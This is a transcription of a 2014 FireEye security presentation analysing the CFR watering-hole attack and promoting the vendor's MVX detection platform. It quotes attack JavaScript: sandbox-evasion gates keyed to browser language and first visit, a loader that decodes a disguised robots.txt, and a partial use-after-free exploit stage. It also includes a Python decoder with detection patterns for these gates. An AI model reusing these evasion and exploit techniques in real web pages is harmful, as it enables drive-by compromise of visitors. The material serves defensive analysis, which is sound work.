Transcription
Agenda (19 February 2014)
- Threat Landscape Deep Dive
- A look inside the challenges of detection technology
- The FireEye Platform
- FireEye Platform: A Case Study
Current State of Cyber Security: the new threat landscape
- Coordinated, persistent threat actors
- Dynamic, polymorphic malware
- Multi-vector attacks
- Multi-staged attacks
Multi-Staged Cyber Attack
1. Exploitation of the system (exploit server)
2. Malware executable download
3. Callbacks and control established (callback server)
4. Lateral spread (diagram: File Share 1, File Share 2, IPS)
5. Data exfiltration
Exploit detection is critical: all subsequent stages can be hidden or obfuscated.
What Is An Exploit?
A compromised web page carries an exploit object, and the exploit object can be in ANY web page.
1. The exploit object is rendered by vulnerable software
2. The exploit injects code into running program memory
3. Control transfers to the exploit code
An exploit is NOT the same as the malware executable file!
Structure of a Multi-Flow APT Attack (e.g. Operation Aurora, Operation Beebus, CFR)
1. Embedded exploit alters the endpoint: the exploit in a compromised web page (served from the exploit server) injects code
2. Callback to the callback server
3. Encrypted malware downloads
4. Callback and data exfiltration to the command and control server
Multi-Vector Structure of an APT Attack
1. Weaponized email with zero-day (2011 Recruitment Plan.xls): click to infect
2. Callback to the callback server
3. Backdoor
4. HTTP to the command and control (C&C) server
Traditional "Defense in Depth" is failing
The new breed of attacks evades signature-based defenses: anti-spam gateways, IPS, firewalls/NGFW, secure web gateways, desktop AV (the traditional reactive approach to detecting threats).
Even "classic" sandboxes are not enough: the CFR attack
Initial check (language, Windows & Java): the page bails out to a blank page unless the browser language is one of the targeted locales.

    if (h != "zh-cn" && h != "en-us" && h != "zh-tw" && h != "ja" && h != "ru" && h != "ko") {
        location.href = "about:blank";
    }
CFR attack: check for first-time access
Only the first visit is served the exploit; a repeat visit (including a re-execution in a sandbox) is sent to a blank page.

    var num = DisplayInfo();
    if (num > 1) {
        location.href = "about:blank";
    }
CFR attack: load the Flash object

    document.body.innerHTML = "<object classid=\"clsid:D27CDB6E-AE6D-11cf-96B8-444553540000\" width=\"100%\" height=\"100%\" id=\"today\">"
        + "<param name=\"movie\" value=\"today.swf\"/>"
        + "<param name=\"quality\" value=\"high\"/>"
        + "<param name=\"bgcolor\" value=\"#ffffff\"/>"
        + "<param name=\"allowScriptAccess\" value=\"sameDomain\"/>"
        + "<param name=\"allowFullScreen\" value=\"true\"/>"
        + "</object><iframe src=\"news.html\"></iframe>";
CFR attack: download the text file and decode it
The page fetches robots.txt synchronously, turns every "jj" back into "%" and runs unescape() on the result, which yields the next-stage script.

    xmlhttp.open('get', 'robots.txt', false);
    xmlhttp.send();
    var page = xmlhttp.responseText;
    page = page.replace(/jj/g, "%");
    code = unescape(page);
CFR attack: the encoded robots.txt and its decoded content
Encoded fragments as served: ...jj61jj72... and ...20jj69jj20jj3Cjj20jj61jj72... ("%61%72" decodes to "ar", "%20%69%20%3C%20%61%72" to " i < ar"). After DECODE the text file is the exploit stage: it allocates DOM objects, frees half of them, forces garbage collection and then touches the freed elements (parts of the script are cut off in the transcription):

    var e0 = null; var e1 = null; var e2 = null;
    var arrObject = new Array(3000);
    var elmObject = new Array(500);
    for (var i = 0; i < arrObject.length; i++) { arrObject[i] = ...me a"); }
    for (var i = 0; i < arrObject.length; i += 2) { arrObject[i].className = null; }
    CollectGarbage();
    for (var i = 0; i < elmObject.length; i++) { elmObject[i] = document.createElement('button'); }
    for (var i = 1; i < arrObject.length; i += 2) { arrObject[i].className = null; }
    CollectGarbage();
    try { location.href = 'ms-help://' } catch (e) {}
    try {
        e0 = document.getElementById("a");
        e1 = document.getElementById("b");
        e2 = ...pplyElement(e0);
        e2.outerText = ...
    } catch (e) {}
    CollectGarbage();
    for (var i = 0; i < 20; i++) { arrObject[i].className = ...a"); }
    window.location = .../account");
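The robots.txt decode step and the two gating checks from the slides above, as an added analyst helper that is not code from the slides or from FireEye; the sample payload and landing script are constructed, and js_unescape, decode_stage and find_evasion_checks are names chosen here:

```python
"""Added analyst helper (not from the slides): reverses the robots.txt
obfuscation shown above ("jj" -> "%", then unescape()) and flags the gating
checks from the landing page. All inputs below are constructed samples."""
import re

# Constructed sample: "var s = 1;" with every "%" written as "jj", the way the
# slides show robots.txt being encoded (e.g. "jj61jj72" decodes to "ar").
SAMPLE_ROBOTS_TXT = "jj76jj61jj72jj20jj73jj20jj3Djj20jj31jj3B"

# Constructed landing-page script carrying the language gate and first-visit gate.
SAMPLE_LANDING_JS = (
    'if(h!="zh-cn"&&h!="en-us"&&h!="zh-tw"&&h!="ja"&&h!="ru"&&h!="ko")'
    '{location.href="about:blank";}'
    'var num=DisplayInfo();if(num>1){location.href="about:blank";}'
)

_ESC = re.compile(r"%u([0-9A-Fa-f]{4})|%([0-9A-Fa-f]{2})")

def js_unescape(s: str) -> str:
    """Mirror JavaScript's legacy unescape(): %XX bytes and %uXXXX code units."""
    return _ESC.sub(lambda m: chr(int(m.group(1) or m.group(2), 16)), s)

def decode_stage(payload: str, marker: str = "jj") -> str:
    """Undo the obfuscation from the slide: marker -> '%', then unescape()."""
    return js_unescape(payload.replace(marker, "%"))

# Indicators of the sandbox-evasion gates shown on the slides.
EVASION_PATTERNS = {
    "language_gate": re.compile(r'!=\s*"(?:zh-cn|en-us|zh-tw|ja|ru|ko)"'),
    "first_visit_gate": re.compile(r"DisplayInfo\(\)"),
    "bail_to_blank": re.compile(r'location\.href\s*=\s*"about:blank"'),
}

def find_evasion_checks(script: str) -> list:
    """Names of the evasion gates present in a script, in dictionary order."""
    return [name for name, pat in EVASION_PATTERNS.items() if pat.search(script)]

def looks_like_script(decoded: str) -> bool:
    """A robots.txt that decodes to JavaScript-looking text is a strong indicator."""
    return bool(re.search(r"\bvar\b|\bfunction\b|document\.", decoded))

if __name__ == "__main__":
    stage = decode_stage(SAMPLE_ROBOTS_TXT)
    print("decoded:", stage, "| script-like:", looks_like_script(stage))
    print("gates:", find_evasion_checks(SAMPLE_LANDING_JS))
```

Run the decoder over a robots.txt captured from the proxy; a legitimate robots.txt never decodes to script text, so looks_like_script on the decoded output is the detection signal.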
CFR attack: get the shell code to run (diagram: shell code, malicious file, cache)
So what are the problems with detecting the attack in a classic sandbox?
- Four objects are needed to perform the attack:
  - HTML/JavaScript: downloads the TXT file
  - Text file: exploits the vulnerability
  - Image file: dropper (gets decoded)
- Are all of these part of the same flow? Definitely NOT.
So what are the problems with detecting the attack in a classic sandbox?
- Can I send all these files to a sandbox for execution? Today.swf, News.html, Robots.txt, Image.jpg
- Rather not ... and what about the "JPG" file?
The Objective: "Continuous Threat Protection" (diagram: Time to Detect, Time to Fix, REAL TIME Prevent; impact: theft of assets & IP, cost of response, disruption to business, reputation risk)
Virtual Machine-Based Model of Detection
MVX finds known and unknown cyber-attacks in real time across all attack vectors: purpose-built for security, hardened security.
FireEye Technology: Inside the MVX
1. FireEye Hardened Hypervisor: a custom hypervisor with built-in countermeasures, designed for threat analysis, running directly on the hardware
2. Massive cross matrix of virtual execution: multiple operating systems, multiple service packs, multiple applications, multiple application versions (Cross-Matrix Virtual Execution)
3. Threat protection at scale: 2000 simultaneous executions, 2000 execution environments, multi-flow analysis, control plane
(Chart: MVX throughput in objects/hour, Phase 1 vs. Phase 2, axis 200000 to 400000; "Reduce False Negatives"; "Multi-flow virtual analysis".) HTML and JavaScript form 95% of objects to be scanned on the wire (1M objects/hour); APT web attacks are nearly invisible needles in a haystack of network traffic.
(Platform diagram: Network Threat Prevention with MVX and Dynamic Threat Intelligence; Email Threat Prevention alongside the SEG; Mobile Threat Prevention alongside MDM; Endpoint Threat Prevention alongside host anti-virus, IPS and SWG; workflow steps Validate and Contain & Isolate.)
FireEye Platform: Workflow
1. FireEye network platforms monitor flows for events: signature-less virtual execution technology (MVX), monitoring for targeted and zero-day attacks, multi-vector threat defense, real-time threat protection
2. FireEye network platforms alert FireEye HX on an event (OS change report)
3. FireEye HX validates endpoints for compromise: reach endpoints anywhere, understand what happened, detect events in the past; the agent automatically investigates endpoints no matter where they are (corporate headquarters or elsewhere)
4. Contain & isolate: deny attackers access to systems with a single mouse click while still allowing ... (diagram: Office, Hotel, Coffee Shop, Corporate Headquarters)
Summary
- Today's attacks are more advanced and sophisticated
- Traditional defenses can't stop them
- Real-time, integrated, signature-less platform across attack vectors
- The FireEye cross-enterprise platform: complete protection against today's new breed of cyber attacks with Email Threat Protection, Mobile Threat Protection and Endpoint Threat Protection
FireEye Product Portfolio: Powered by MVX
- Threat Analytics Platform
- MVX and Dynamic Threat Intelligence
- Email Threat Prevention (with the SEG)
- Mobile Threat Prevention (with MDM)
- Endpoint Threat Prevention (with host anti-virus)